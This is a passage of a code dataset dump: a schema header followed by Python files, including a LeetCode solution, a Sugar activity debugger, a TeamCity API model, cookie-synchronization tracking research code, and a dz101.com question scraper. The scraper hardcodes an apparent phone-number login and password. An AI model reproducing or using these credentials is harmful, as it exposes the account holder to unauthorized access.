blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
616
content_id
stringlengths
40
40
detected_licenses
listlengths
0
112
license_type
stringclasses
2 values
repo_name
stringlengths
5
115
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
777 values
visit_date
timestamp[us]date
2015-08-06 10:31:46
2023-09-06 10:44:38
revision_date
timestamp[us]date
1970-01-01 02:38:32
2037-05-03 13:00:00
committer_date
timestamp[us]date
1970-01-01 02:38:32
2023-09-06 01:08:06
github_id
int64
4.92k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-04 01:52:49
2023-09-14 21:59:50
gha_created_at
timestamp[us]date
2008-05-22 07:58:19
2023-08-21 12:35:19
gha_language
stringclasses
149 values
src_encoding
stringclasses
26 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
3
10.2M
extension
stringclasses
188 values
content
stringlengths
3
10.2M
authors
listlengths
1
1
author_id
stringlengths
1
132
727d16455790234bc5ad2fa656380bfc5a8ff77a
1852be4726dc1d83780740678819192277159e0f
/LC/97.py
4b43cefdb31dc175807adac8a7da8d074298f5c2
[ "MIT" ]
permissive
szhu3210/LeetCode_Solutions
f0a32e30df54b655fdb9c7d48622382f29781409
64747eb172c2ecb3c889830246f3282669516e10
refs/heads/master
2020-06-30T05:45:40.550146
2017-08-11T04:10:25
2017-08-11T04:10:25
74,389,515
2
0
null
null
null
null
UTF-8
Python
false
false
1,631
py
class Solution(object): def isInterleave(self, s1, s2, s3): """ :type s1: str :type s2: str :type s3: str :rtype: bool """ ## iterative (DP) (35ms) l1=len(s1) l2=len(s2) l3=len(s3) co=[(-1,-1)] x=0 while x<l3 and co: nco=[] for c in co: if c[0]<l1-1 and s3[x]==s1[c[0]+1] and (c[0]+1,c[1]) not in nco: nco.append((c[0]+1,c[1])) if c[1]<l2-1 and s3[x]==s2[c[1]+1] and (c[0],c[1]+1) not in nco: nco.append((c[0],c[1]+1)) co=nco x+=1 return (l1-1,l2-1) in co ## recursive (keep historical record) (68ms) # d={} # return self.helper(s1,s2,s3,d) # def helper(self, s1,s2,s3,d): # if len(s1)+len(s2)!=len(s3): # return False # if (s1,s2,s3) in d: # return False # if s1=='': # t = s2==s3 # if t: # return True # else: # d[(s1,s2,s3)]=t # return False # if s2=='': # t = s1==s3 # if t: # return True # else: # d[(s1,s2,s3)]=t # return False # t1 = self.helper(s1[1:],s2,s3[1:],d) if s3[0]==s1[0] else False # if t1: # return True # t2 = self.helper(s1,s2[1:],s3[1:],d) if s3[0]==s2[0] else False # if t2: # return True # d[(s1,s2,s3)]=False # return False
[ "szhu@email.arizona.edu" ]
szhu@email.arizona.edu
ec1b3f7c328d034d94959ab8c0c4ca7566c4ba57
03f1560cedc273f99d64a93224fe7a2211aa5680
/src/vsc/report/coverage_report.py
510e26b55a5197191af6e48a1e4d499269a02eb5
[ "Apache-2.0" ]
permissive
cmarqu/pyvsc
9be19fbcd3df37a406ecaa1cdf46b5209e9e9866
c7ff708256b7cdce0eccab8b7d6e2037edbdc5fa
refs/heads/master
2021-06-14T07:19:25.381354
2020-04-08T01:50:49
2020-04-08T01:50:49
254,485,300
0
0
Apache-2.0
2020-04-09T21:47:58
2020-04-09T21:47:57
null
UTF-8
Python
false
false
1,100
py
''' Created on Mar 25, 2020 @author: ballance ''' from typing import List class CoverageReport(object): """Coverage report in object-model form. Converted to text for display""" def __init__(self): self.covergroups : List['CoverageReport.Covergroup'] = [] class Coveritem(object): def __init__(self, name): self.name = name self.coverage = 0.0 class Covergroup(Coveritem): def __init__(self, name : str, is_type : bool): CoverageReport.Coveritem.__init__(self, name) self.is_type = is_type self.covergroups = [] self.coverpoints = [] self.crosses = [] class Coverpoint(Coveritem): def __init__(self, name : str): CoverageReport.Coveritem.__init__(self, name) self.bins = [] class Coverbin(Coveritem): def __init__(self, name : str, n_hits): CoverageReport.Coveritem.__init__(self, name) self.n_hits = n_hits
[ "matt.ballance@gmail.com" ]
matt.ballance@gmail.com
21c40f16baa986546f9ac952a9717fba5b578383
8e576efb1b76a038cf7e7ec631eb33db9f1c0155
/continue_debug.py
9ca606d666a9cec932b2851b03fb61c42c2edf8a
[]
no_license
sugar-activities/4378-activity
779ec91bb60f05c617edb5b5393fe95b454a9b71
eedab96fc1bf541983eb66f0aaf417d767cc0df7
refs/heads/master
2021-01-19T23:14:24.238128
2017-04-21T05:52:23
2017-04-21T05:52:23
88,937,226
0
0
null
null
null
null
UTF-8
Python
false
false
4,823
py
#!/usr/bin/env python # # Copyright (C) 2007, Red Hat, Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from __future__ import with_statement import os import sys #debug tool to analyze the activity environment # Initialize logging. import logging from pydebug_logging import _logger, log_environment _logger.setLevel(logging.DEBUG) from sugar.activity import activityfactory from sugar.bundle.activitybundle import ActivityBundle #define the interface with the GUI from Rpyc import * try: c = SocketConnection('localhost') db = c.modules.pydebug.pydebug_instance except AttributeError: print('cannot connect to localhost') except e: print(e[1]) assert False #define interface with the command line ipython instance from IPython.core import ipapi ip = ipapi.get() global __IPYTHON__ try: __IPYTHON__ print('IPTHON is defined') except: __IPYTHON__ = ip o = ip.options o.xmode = db.traceback def edit_glue(self,filename,linenumber): _logger.debug('position to editor file:%s. Line:%d'%(filename,linenumber)) ip.set_hook('editor',edit_glue) def sync_called(self,filename,line,col): print('synchronize called. file:%s. line:%s. Col:%s'%(filename,line,col)) ip.set_hook('synchronize_with_editor',sync_called) #get the information about the Activity we are about to debug child_path = db.child_path _logger.debug('child path: %s'%child_path) print('child path starting activity: %s'%child_path) go_cmd = 'run -d -b %s %s'%(os.path.join(db.pydebug_path,'bin','start_debug.py'),child_path) _logger.debug('defining go: %s'%go_cmd) ip.user_ns['go'] = go_cmd _logger.debug('pydebug home: %s'%db.debugger_home) path = child_path pydebug_home = db.debugger_home os.environ['PYDEBUG_HOME'] = pydebug_home os.chdir(path) os.environ['SUGAR_BUNDLE_PATH'] = path _logger.debug('sugar_bundle_path set to %s'%path) #set up module search path sys.path.insert(0,path) activity = ActivityBundle(path) cmd_args = activityfactory.get_command(activity) _logger.debug('command args:%r'%cmd_args) bundle_name = activity.get_name() bundle_id = activity.get_bundle_id() #need to get activity root, but activity bases off of HOME which some applications need to change #following will not work if storage system changes with new OS #required because debugger needs to be able to change home so that foreign apps will work activity_root = os.path.join('/home/olpc/.sugar/default/',bundle_id) os.environ['SUGAR_ACTIVITY_ROOT'] = activity_root _logger.debug('sugar_activity_root set to %s'%activity_root) #following is useful for its side-effects info = activityfactory.get_environment(activity) _logger.debug("Command to execute:%s."%cmd_args[0]) if not cmd_args[0].startswith('sugar-activity'): target = os.path.join(pydebug_home,os.path.basename(cmd_args[0])) with open(target,'w') as write_script_fd: with open(cmd_args[0],'r') as read_script_fd: for line in read_script_fd.readlines(): if line.startswith('exec') or line.startswith('sugar-activity'): pass else: write_script_fd.write(line) line = 'export -p > %s_env\n'%target write_script_fd.write(line) #write the environment variables to another file write_script_fd.close() os.chmod(target,0755) os.system(target) _logger.debug('writing env script:%s'%target) #read the environment back into the current process with open('%s_env'%target,'r') as env_file: env_dict = {} for line in env_file.readlines(): if not line.startswith('export'): pass payload = line.split()[1] pair = payload.split('=') if len(pair)> 1: key = pair[0] value = pair[1] env_dict[key] = value _logger.debug('reading environment. %s => %s'%(key,value,)) os.environ = env_dict more_args = ['-a',bundle_name,'-b',bundle_id] sys.argv = cmd_args[:2] + more_args _logger.debug('about to call main.main() with args %r'%sys.argv) log_environment() from sugar.activity import main main.main()
[ "ignacio@sugarlabs.org" ]
ignacio@sugarlabs.org
42464cf07abf0758db1a5c82e682019c368ab0cf
2e50af6e12bf1c815c8efb3695a5bb41507d66bd
/ppomppu/crawling_data/migrations/0001_initial.py
23053b1d9b999d1506fdd26719ba032e71a32c7e
[]
no_license
KimDoKy/Ppomppu_check
e5fe57ba2bed84e4236742bfc4352460b7313f89
b7d09ac1ab46d051636f54b5890f190b3ad97419
refs/heads/master
2022-12-15T10:42:10.717898
2021-06-22T12:46:20
2021-06-22T12:46:20
167,160,601
2
1
null
2022-12-08T01:48:49
2019-01-23T10:01:49
JavaScript
UTF-8
Python
false
false
871
py
# Generated by Django 2.1.5 on 2019-01-30 14:50 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='CrawlingData', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.TextField()), ('category', models.CharField(max_length=10)), ('write_date', models.CharField(max_length=10)), ('detail_link', models.URLField()), ('prod_image', models.URLField(blank=True, null=True)), ('crawling_data', models.DateTimeField(auto_now_add=True)), ('status', models.BooleanField(default=False)), ], ), ]
[ "makingfunk0@gmail.com" ]
makingfunk0@gmail.com
d64e9569c2249f8d5cf47948bb273030c95f0a6c
a14b3e43705d74da97451de8663e9a98c088aec3
/dohq_teamcity/models/vcs_roots.py
1fe9c882557685c3fed4ad0ab2c3b8e4d637f5b0
[ "MIT" ]
permissive
devopshq/teamcity
b5a36d6573cdde2f7c72e77a8e605198a7c7124d
7a73e05c0a159337ed317f8b8d8072e478a65ca6
refs/heads/develop
2023-01-16T07:06:07.514297
2022-12-30T10:24:07
2022-12-30T10:24:07
153,228,762
29
13
MIT
2023-09-08T08:49:56
2018-10-16T05:42:15
Python
UTF-8
Python
false
false
3,982
py
# coding: utf-8 from dohq_teamcity.custom.base_model import TeamCityObject # from dohq_teamcity.models.vcs_root import VcsRoot # noqa: F401,E501 class VcsRoots(TeamCityObject): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'count': 'int', 'href': 'str', 'next_href': 'str', 'prev_href': 'str', 'vcs_root': 'list[VcsRoot]' } attribute_map = { 'count': 'count', 'href': 'href', 'next_href': 'nextHref', 'prev_href': 'prevHref', 'vcs_root': 'vcs-root' } def __init__(self, count=None, href=None, next_href=None, prev_href=None, vcs_root=None, teamcity=None): # noqa: E501 """VcsRoots - a model defined in Swagger""" # noqa: E501 self._count = None self._href = None self._next_href = None self._prev_href = None self._vcs_root = None self.discriminator = None if count is not None: self.count = count if href is not None: self.href = href if next_href is not None: self.next_href = next_href if prev_href is not None: self.prev_href = prev_href if vcs_root is not None: self.vcs_root = vcs_root super(VcsRoots, self).__init__(teamcity=teamcity) @property def count(self): """Gets the count of this VcsRoots. # noqa: E501 :return: The count of this VcsRoots. # noqa: E501 :rtype: int """ return self._count @count.setter def count(self, count): """Sets the count of this VcsRoots. :param count: The count of this VcsRoots. # noqa: E501 :type: int """ self._count = count @property def href(self): """Gets the href of this VcsRoots. # noqa: E501 :return: The href of this VcsRoots. # noqa: E501 :rtype: str """ return self._href @href.setter def href(self, href): """Sets the href of this VcsRoots. :param href: The href of this VcsRoots. # noqa: E501 :type: str """ self._href = href @property def next_href(self): """Gets the next_href of this VcsRoots. # noqa: E501 :return: The next_href of this VcsRoots. # noqa: E501 :rtype: str """ return self._next_href @next_href.setter def next_href(self, next_href): """Sets the next_href of this VcsRoots. :param next_href: The next_href of this VcsRoots. # noqa: E501 :type: str """ self._next_href = next_href @property def prev_href(self): """Gets the prev_href of this VcsRoots. # noqa: E501 :return: The prev_href of this VcsRoots. # noqa: E501 :rtype: str """ return self._prev_href @prev_href.setter def prev_href(self, prev_href): """Sets the prev_href of this VcsRoots. :param prev_href: The prev_href of this VcsRoots. # noqa: E501 :type: str """ self._prev_href = prev_href @property def vcs_root(self): """Gets the vcs_root of this VcsRoots. # noqa: E501 :return: The vcs_root of this VcsRoots. # noqa: E501 :rtype: list[VcsRoot] """ return self._vcs_root @vcs_root.setter def vcs_root(self, vcs_root): """Sets the vcs_root of this VcsRoots. :param vcs_root: The vcs_root of this VcsRoots. # noqa: E501 :type: list[VcsRoot] """ self._vcs_root = vcs_root
[ "allburov@gmail.com" ]
allburov@gmail.com
defa0295f0381cbdb2f43c562eabaa220ee5df58
f8e8d0e3820eb6fd25d3ce621686316ce196c4d0
/Cookie Synchronization/ccs_sync_measurements.py
641962026495bda938f5f99f4b04cc4b779b6d14
[ "MIT" ]
permissive
amirunpri2018/Web-Tracking-in-Indian-Partisan-News-Websites
511b0345fde3cd01473f4918c9e6b82d5bc8c20e
f68c4ae011a499c0519bed0b0cb953a12f438902
refs/heads/main
2023-04-29T12:31:41.879296
2021-05-24T19:27:23
2021-05-24T19:27:23
null
0
0
null
null
null
null
UTF-8
Python
false
false
12,894
py
''' This is the primary code for computing cookie-synchronization across different pairs of websites within each crawl ''' import extract_cookie_ids import extract_id_knowledge import census_util import find_site_leaning import classify_domains from collections import defaultdict import sqlite3 as lite import queue import re import os import numpy import csv # Global Aggregation Variables global_known_ids = {} global_id_to_domain_map = defaultdict(list) global_id_to_cookie_map = defaultdict(list) # Path of the OpenWPM Dara DATA_DIR = os.path.join(os.path.abspath(os.pardir),'OpenWPM Crawls') # BFS HOP ANALYSIS # for a given domain, returns a sorted list of sites within <hops> steps away in the sync graph def build_hop_neighborhood(seed_domain, hop, domain_to_id, id_to_domain): domains_explored = set() # list of domains we've visited search_queue = queue.Queue() # list of the sites that we'll be visiting search_queue.put((seed_domain, 0)) # seeds the search with the initial domain # performs the BFS neighborhood search while not search_queue.empty(): curr_domain, curr_depth = search_queue.get() # break the search if the nodes are too far away if curr_depth > hop: break # don't explore the node if we've already seen it if curr_domain in domains_explored: continue domains_explored.add(curr_domain) # don't expand out to neighbors if we are at the edge of the neighborhood if curr_depth == hop: continue # update the search queue for cookie_id in domain_to_id[curr_domain]: for domain in id_to_domain[cookie_id]: search_queue.put((domain, curr_depth + 1)) neighborhood = list(domains_explored) neighborhood.sort() return neighborhood # OVERALL COOKIE SYNC SCRIPT # prints off the relevant statistics for the cookie syncing studies, given two crawl databases # <db_to_analyze> specifies whether to extract from db1 or db2 def output_sync_measurements(db1, visit_id1, db2, visit_id2, db_to_analyze=1): global global_known_ids global global_id_to_domain_map global global_id_to_cookie_map print("Extracting persistent identifiers from each crawl...") # extract the cookie ids on a per-database basis cookies_db1 = extract_cookie_ids.extract_persistent_ids_from_dbs([db1], visit_id1) cookies_db2 = extract_cookie_ids.extract_persistent_ids_from_dbs([db2], visit_id2) print("Grabbing cookies...") # get the cookies that appear to be consistent ids and extract their values from db1 id_cookies = extract_cookie_ids.extract_common_id_cookies([cookies_db1, cookies_db2]) if db_to_analyze == 1: domain_to_fp_map = census_util.build_domain_map(db1, visit_id1) known_ids = extract_cookie_ids.extract_known_cookies_from_db(db1, id_cookies, visit_id1) else: domain_to_fp_map = census_util.build_domain_map(db2, visit_id2) known_ids = extract_cookie_ids.extract_known_cookies_from_db(db2, id_cookies, visit_id2) # remove known opt-out cookie strings for key in known_ids.keys(): if (known_ids[key] == '0' \ or known_ids[key] == '00000000-0000-0000-0000-000000000000' \ or known_ids[key] == '0000000000000000' \ or known_ids[key] == 'AAAAAAAAAAAAAAAAAAAAAA'): del known_ids[key] # Creating Global version for known_ids for key in known_ids.keys(): if key not in global_known_ids.keys(): global_known_ids[key] = [] global_known_ids[key].append(known_ids[key]) else: if known_ids[key] not in global_known_ids[key]: global_known_ids[key].append(known_ids[key]) global_id_to_cookie_map = extract_cookie_ids.map_list_of_ids_to_cookies(global_known_ids) print("Build mapping between cookies, domains, and first parties...") # build the three maps that are most fundamental to the analysis id_to_cookie_map = extract_cookie_ids.map_ids_to_cookies(known_ids) id_to_cookie_map_pruned = census_util.prune_list_dict(id_to_cookie_map) if db_to_analyze == 1: id_to_domain_map = extract_id_knowledge.build_id_knowledge_dictionary(defaultdict(list), id_to_cookie_map, db1, visit_id1) global_id_to_domain_map = extract_id_knowledge.build_id_knowledge_dictionary(global_id_to_domain_map, global_id_to_cookie_map, db1, visit_id1) else: id_to_domain_map = extract_id_knowledge.build_id_knowledge_dictionary(defaultdict(list), id_to_cookie_map, db2, visit_id2) global_id_to_domain_map = extract_id_knowledge.build_id_knowledge_dictionary(global_id_to_domain_map, global_id_to_cookie_map, db2, visit_id2) id_to_domain_map = census_util.prune_list_dict(id_to_domain_map) domain_to_id_map = extract_id_knowledge.map_domains_to_known_ids(id_to_domain_map) domain_to_id_map_pruned = census_util.prune_list_dict(domain_to_id_map) print("Dumping results...") # ID and # of domains with knowledge of it id_to_domain_counts = census_util.sort_tuples([(key, len(id_to_domain_map[key])) for key in id_to_domain_map]) # print(id_to_domain_counts) id_to_dm = list() for x in id_to_domain_counts: id_to_dm.append(x[1]) # print(str(x[0]) + "\t" + str(x[1])) # Domain and IDs that it has knowledge of:") domain_to_id_counts = census_util.sort_tuples([(key, len(domain_to_id_map[key])) for key in domain_to_id_map]) # print(domain_to_id_counts) dm_to_id = list() for domain, count in domain_to_id_counts: neigh1 = build_hop_neighborhood(domain, 1, domain_to_id_map, id_to_domain_map) depth1 = len(neigh1) num_doms1 = len(census_util.get_values_from_keys(neigh1, domain_to_fp_map)) neigh2 = build_hop_neighborhood(domain, 2, domain_to_id_map, id_to_domain_map) depth2 = len(neigh2) num_doms2 = len(census_util.get_values_from_keys(neigh2, domain_to_fp_map)) dm_to_id.append(count) # print(str(domain) + "\t" + str(count) + "\t" + str(depth1) + "\t" + str(num_doms1) + "\t" + str(depth2) + "\t" + str(num_doms2)) a = str(len(id_to_cookie_map)) b = str(len(known_ids)) c = str(len(id_to_domain_map)) id_cookies_in_sync = [cookie for key in id_to_domain_map for cookie in id_to_cookie_map[key]] d = str(len(list(set(id_cookies_in_sync)))) e = str(len(domain_to_id_map)) if len(dm_to_id) == 0: f = "0 | 0 | 0 | 0 " else: f = str(min(dm_to_id)) + " | " + str(round(numpy.mean(dm_to_id), 2)) + ' | ' + str(round(numpy.median(dm_to_id), 2)) + " | " + str(max(dm_to_id)) if len(id_to_dm) == 0: g = "0 | 0 | 0 | 0 " else: g = str(min(id_to_dm)) + " | " + str(round(numpy.mean(id_to_dm), 2)) + ' | ' + str(round(numpy.median(id_to_dm), 2)) + " | " + str(max(id_to_dm)) return a, b, c, d, e, f, g # The below codes does the same things as done by output_sync_measurements() function # and produces an aggregate value for all website pairs if __name__ == "__main__": # Enter location of the file (crawl_file.sqlite) currently being run Stateful_Crawl = os.path.join(DATA_DIR, 'crawl-data_stateful_homepage1.sqlite') data_folder_path = os.path.join(os.path.abspath(os.pardir)) # Enter name of the political groups being studied currently (Eg. LEFT-RIGHT) file_path = os.path.join(os.path.join(data_folder_path, 'Cookie Synchronization Analysis'), 'CS RIGHT-RIGHT Analysis.csv') writer = csv.writer(open(file_path, 'w', newline='')) writer.writerow(['Website1', 'Leaning_of_Website1', 'Website2', 'Leaning_of_Website2', 'No_of_IDs', 'No_of_ID_Cookies', 'No_of_IDs_in_Sync', 'No_of_ID_Cookies_in_Sync', 'No_of_Domains_in_Sync', 'IDs_known_per_Party (Min | Mean | Median | Max)', 'Parties_knowing_an_ID (Min | Mean | Median | Max)']) conn = lite.connect(Stateful_Crawl) cur = conn.cursor() # Choosing website pairs to dtudy once-by-onne for site1 in range(1, 123): for res in cur.execute('SELECT arguments FROM crawl_history'+' WHERE visit_id = '+str(site1)): site1_url = str(res[0]).split(',')[0][9:-1] site1_leaning = find_site_leaning.get_leaning(site1_url) if site1_leaning not in ['RIGHT']: # ['RIGHT', 'LEFT', 'CENTRE']: continue for site2 in range(site1+1, 124): print(site1) for res in cur.execute('SELECT arguments FROM crawl_history'+' WHERE visit_id = '+str(site2)): site2_url = str(res[0]).split(',')[0][9:-1] site2_leaning = find_site_leaning.get_leaning(site2_url) if site2_leaning not in ['RIGHT']: # ['RIGHT', 'LEFT', 'CENTRE']: continue # print(site1, site1_url, site2, site2_url) a, b, c, d, e, f, g = output_sync_measurements(Stateful_Crawl, site1, Stateful_Crawl, site2) writer.writerow([site1_url, site1_leaning, site2_url, site2_leaning, a, b, c, d, e, f, g]) # Compute same things as above but this time for global variables global_id_to_domain_map = census_util.prune_list_dict(global_id_to_domain_map) global_domain_to_id_map = extract_id_knowledge.map_domains_to_known_ids(global_id_to_domain_map) global_id_to_domain_counts = census_util.sort_tuples([(key, len(global_id_to_domain_map[key])) for key in global_id_to_domain_map]) print(global_id_to_domain_counts) global_id_to_dm = list() for x in global_id_to_domain_counts: global_id_to_dm.append(x[1]) print(str(x[0]) + ", " + str(x[1])) global_domain_to_id_counts = census_util.sort_tuples([(key, len(global_domain_to_id_map[key])) for key in global_domain_to_id_map]) global_dm_to_id = list() for domain, count in global_domain_to_id_counts: global_dm_to_id.append(count) global_id_cookies_in_sync = [cookie for key in global_id_to_domain_map for cookie in global_id_to_cookie_map[key]] fp, tp = classify_domains.get_fp_tp_counts(global_domain_to_id_map) print("\n===========================================================================================\n") print("\n################################## ID TO COOKIE MAP #######################################\n") print(global_id_to_cookie_map) print("\n===========================================================================================\n") print("\n===========================================================================================\n") print("\n###################################### KNOWN IDs ##########################################\n") print(global_known_ids) print("\n===========================================================================================\n") print("\n===========================================================================================\n") print("\n################################## ID TO DOMAIN MAP #######################################\n") print(global_id_to_domain_map) print("\n===========================================================================================\n") print("\n===========================================================================================\n") print("\n################################## DOMAIN TO ID MAP #######################################\n") print(global_domain_to_id_map) print("\n===========================================================================================\n") # AGGREGATED STATS print("\n\n\n===========================================================================================") print("\nAggregated Summary statistics:") print("NUMBER OF IDs: " + str(len(global_id_to_cookie_map))) print("NUMBER OF ID COOKIES: " + str(len(global_known_ids))) print("NUMBER OF IDs IN SYNCS: " + str(len(global_id_to_domain_map))) print("NUMBER OF ID COOKIES IN SYNC: " + str(len(list(set(global_id_cookies_in_sync))))) print("NUMBER OF DOMAINS IN SYNC: " + str(len(global_domain_to_id_map))) print("NUMBER OF FP DOMAINS IN SYNC: " + str(fp)) print("NUMBER OF TP DOMAINS IN SYNC: " + str(tp)) print(" Min | Mean | Median | Max") print("IDs KNOWN PER PARTY : " + str(min(global_dm_to_id)) + " | " + str(round(numpy.mean(global_dm_to_id), 2)) + " | " + str(round(numpy.median(global_dm_to_id), 2)) + " | " + str(max(global_dm_to_id))) print("PARTIES KNOWING AN ID : " + str(min(global_id_to_dm)) + " | " + str(round(numpy.mean(global_id_to_dm), 2)) + " | " + str(round(numpy.median(global_id_to_dm), 2)) + " | " + str(max(global_id_to_dm))) print("\n===========================================================================================\n\n\n")
[ "noreply@github.com" ]
amirunpri2018.noreply@github.com
4614138089e9786f27b020db0dca4e5c32f2cf16
f160d992d0ea5fa4e36af0025b5637c8962f2a29
/dz101_spider/questions/mini_spider/dz101_question_mini_spider.py
f38e3cf331ad1a52bb4a38d8cdce2becab852b51
[]
no_license
Zachypentakill/Afanti_tiku
369dde43a32cecb136eb1207bf4223f6decd9843
aebee5b3d8dce76f95620cb52fda5a0f19965945
refs/heads/master
2021-07-11T15:59:03.099600
2017-10-11T10:27:43
2017-10-11T10:27:43
null
0
0
null
null
null
null
UTF-8
Python
false
false
7,615
py
# -*- coding: utf-8 -*- import asyncio import logging import json from achihuo_mini.async_loop import AsyncLoop from achihuo_mini.item import Item from afanti_tiku_lib.utils import md5_string from afanti_tiku_lib.dbs.mysql_pool import CommonMysql from afanti_tiku_lib.dbs import html_archive from afanti_tiku_lib.dbs.execute import execute from afanti_tiku_lib.html.extract import get_html_element from adsl_server.proxy import Proxy from login import login LOGGING_FORMAT = '%(asctime)-15s:%(levelname)s: %(message)s' logging.basicConfig(format=LOGGING_FORMAT, level=logging.INFO, filename='working/achihuo_mini.log', filemode='a') mysql = CommonMysql('html_archive2') mysql_conn = mysql.connection() _proxy = Proxy() INFOS = ( {'key': '初中语文', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 189, 'subj': '初中语文', 'aft_subj_id': 1,}, {'key': '初中数学', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 193, 'subj': '初中数学', 'aft_subj_id': 2,}, {'key': '初中英语', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 194, 'subj': '初中英语', 'aft_subj_id': 3,}, {'key': '初中物理', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 195, 'subj': '初中物理', 'aft_subj_id': 5,}, {'key': '初中化学', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 196, 'subj': '初中化学', 'aft_subj_id': 6,}, {'key': '初中生物', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 197, 'subj': '初中生物', 'aft_subj_id': 9,}, {'key': '初中政治', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 198, 'subj': '初中政治', 'aft_subj_id': 10,}, {'key': '初中历史', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 199, 'subj': '初中历史', 'aft_subj_id': 8,}, {'key': '初中地理', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 200, 'subj': '初中地理', 'aft_subj_id': 7,}, {'key': '高中语文', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 109, 'subj': '高中语文', 'aft_subj_id': 21,}, {'key': '高中数学', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 161, 'subj': '高中数学', 'aft_subj_id': 22,}, {'key': '高中英语', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 165, 'subj': '高中英语', 'aft_subj_id': 23,}, {'key': '高中物理', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 166, 'subj': '高中物理', 'aft_subj_id': 25,}, {'key': '高中化学', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 167, 'subj': '高中化学', 'aft_subj_id': 26,}, {'key': '高中生物', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 168, 'subj': '高中生物', 'aft_subj_id': 29,}, {'key': '高中政治', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 169, 'subj': '高中政治', 'aft_subj_id': 30,}, {'key': '高中历史', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 170, 'subj': '高中历史', 'aft_subj_id': 28,}, {'key': '高中地理', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 171, 'subj': '高中地理', 'aft_subj_id': 27,}, ) PARAM = ('Key={key}&Subject={subj}&QuestionTypes=&Difficulty=&Year=' '&Grade={grade}&Type=&Area=&subject_id={subj_id}' '&Limit={limit}&Skip={skip}') INTERNAL = 2 * 24 * 60 * 60 class Dz101QuestionMiniSpider(AsyncLoop): NAME = 'dz101_question_mini_spider' def __init__(self): super(Dz101QuestionMiniSpider, self).__init__(concurrency=2, cache_backend='ssdb') self.cookies = login('15542652940', 'www888xxx') async def run(self): for info in INFOS: asyncio.ensure_future(self.get_pages(info)) async def get_pages(self, info): no_new_question = 0 page_num = 0 N = 0 while True: if no_new_question > 30: no_new_question = 0 page_num = 0 await asyncio.sleep(INTERNAL) continue ninfo = dict(info) ninfo['skip'] = page_num * 100 item = make_page_item(ninfo) logging.info('[get_pages]: {}, {}'.format(info['key'], page_num)) item.proxy = 'http://' + '119.7.227.133:9990' # _proxy.get(server_id=105) item.cookies = self.cookies with await self.lock: await asyncio.sleep(10) resp = await self.async_web_request(item, check_html=check_pg) if not (resp and resp.content): continue html_string = resp.text if not N: s = html_string.rfind('</div>|*|') + len('</div>|*|') e = html_string.find('|', s) qs_num = html_string[s:e] if not qs_num: logging.warn('not qs_num: {}'.format( json.dumps(item.json(), ensure_ascii=False))) continue N = int(qs_num) + 100 if page_num * 100 > N: await asyncio.sleep(INTERNAL) continue questions = get_html_element( '<div [^<>]*class="Problems_item"', html_string, regex=True ) has_qs = False for qs in questions: s = qs.find('<tt>') + 4 e = qs.find('</tt>') qid = qs[s:e] hkey = 'dz101_question_{}'.format(qid) if is_archived(hkey): continue has_qs = True logging.info('[question]: {}, {}'.format(info['key'], hkey)) save_html(hkey, qs, ninfo['aft_subj_id'], ninfo) if not has_qs: no_new_question += 1 else: no_new_question = 0 page_num += 1 logging.info('[page done]') def make_page_item(info): url = 'http://www.dz101.com/zujuan/zhishidian/Problems' item = Item(dict( method = 'GET', url = url + '?' + PARAM.format(**info), max_retry = 2, timeout = 120, )) return item def check_pg(html_string): return 'class="Problems_item"' in html_string def get_mysql_connection(): global mysql global mysql_conn try: if mysql_conn.ping() is False: mysql_conn = mysql.connection() return mysql_conn except Exception: mysql_conn = mysql.connection() return mysql_conn def save_html(url, html_string, subj_id, info, flag=0): mysql_conn = get_mysql_connection() info = json.dumps(info, ensure_ascii=False) sql, vals = html_archive.insert_sql( 'dz101_spider_html_archive_table', dict( key = url, html = html_string, md5 = md5_string(html_string), subject = subj_id, source = 56, flag=flag, info = info, ), ignore=True ) execute(mysql_conn, sql, values=vals) def is_archived(url): mysql_conn = get_mysql_connection() cmd = 'select html_id from dz101_spider_html_archive_table where `key` = %s and flag = 0' result = execute(mysql_conn, cmd, values=(url,)) if result: return True else: return False # cmd = 'select question_id from question_pre.question where spider_url = %s and flag = 0' # result = execute(mysql_conn, cmd, values=(url,)) # if result: # result = True # else: # result = False if __name__ == '__main__': loop = Dz101QuestionMiniSpider() loop.start()
[ "yanfeng.li@lejent.com" ]
yanfeng.li@lejent.com
50635945d92a8a30c541386a94cb0d6921c5d146
933cf8cc4cff1083f9e2d24528c97a94758bc8e0
